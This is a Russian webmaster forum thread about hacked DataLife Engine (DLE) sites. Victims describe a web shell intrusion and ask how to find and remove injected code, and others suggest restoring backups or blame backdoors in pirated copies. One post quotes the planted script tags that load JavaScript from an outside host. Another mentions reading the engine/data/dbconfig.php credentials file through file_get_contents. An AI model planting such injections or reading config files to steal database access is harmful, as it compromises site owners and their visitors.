Взлом сайта dle

1 234
Хортица
На сайте с 22.12.2006
Offline
289
#21
vitor:
Хортица вы нашли новую дыру или просто не был установлен патч?

Нет, ничего нового я не находил.

vitor:
А в девятке уязвимостей нет?

Во всех версиях есть

На XBit.Money (https://xbit.money/?rid=111) меняю крипту на гривны. Лучшие курсы Обмен Вашего PayPal/ЯД/QIWI/WebMoney и куча плюшек! Рекомендую (https://exchangex.ru/index.php?who=26749)
Z8
На сайте с 11.04.2010
Offline
49
#22

Здравствуйте, у меня не давно взломали сайт (DLE 8.3) с помощью шелла oRd ( Web Shell by oRb ), проникли в админ панель (возможно на сервер). Теперь в начале страницы подключается два "левых" ява скрипта и несколько iframe'ов. Пробовал искать через какие файлы они были подключены, не получается найти. Проверил все файлы шаблонов, тоже нету.

<script language="JavaScript" charset="windows-1251" rel="nofollow" src="http://under-click.net/js/if.php?id=7780"></script><script language="JavaScript" charset="windows-1251" rel="nofollow" src="http://under-click.net/js/if.php?id=7718"></script> это скрипт который прописали на сайте

Может кто поможет разобраться

[Удален]
#23

Ребята, ну что вы жалуетесь, если на вашем дырявом нулледе DLE даже школьник, при помощи GET addr/file или нехитрого file_get_contents(xxxxxxx/engine/data/dbconfig.php) выудит доступ к БД?

M
На сайте с 28.02.2010
Offline
25
#24
Хортица:
Помогу справиться раз и навсегда с подобной проблемой на ДЛЕ сайтах. По всем вопросам обращайтесь в контакты, которые указаны в подписи.
Как сами понимаете, это не будет бесплатно ;)

Нужна помощь в выявлении дыры в DLE 8.0 через которую встраивается скрипт.

ICQ: 277@979@165

Z8
На сайте с 11.04.2010
Offline
49
#25

Проблема не в заплатке-ее уже поставили. Проблема в том где найти и как удалить вирус который был запущен на сайт.

PS
На сайте с 19.05.2009
Offline
109
#26

zaqw81,

Точно такую же шляпу поставили на один мой сайт, найти никак не могу где он прячется. Оплачу кто поможет разобраться, срочно.

A2
На сайте с 17.11.2009
Offline
52
#27

Разверните пекап, зачем искать иголку в стогу сена

PS
На сайте с 19.05.2009
Offline
109
#28

asmakovec2,

Гениально, если все так просто было бы.

A2
На сайте с 17.11.2009
Offline
52
#29
PainShaft:
asmakovec2,
Гениально, если все так просто было бы.

А в чём затруднения не понимаю? Бекапов нет, или редко делаете?

S
На сайте с 01.04.2010
Offline
9
#30

с помощью wso(web shell by orb) не взламывают сайты(инфа проверена), это просто оболочка чтобы по серву полазить и т.д. и т.п.(https://forum.antichat.ru/thread103155.html), а ломают потому что в нуленых есть бэкдоры, о чём можно почитать тут(https://forum.antichat.ru/threadnav52195-1-10-dle.html)

1 234

Авторизуйтесь или зарегистрируйтесь, чтобы оставить комментарий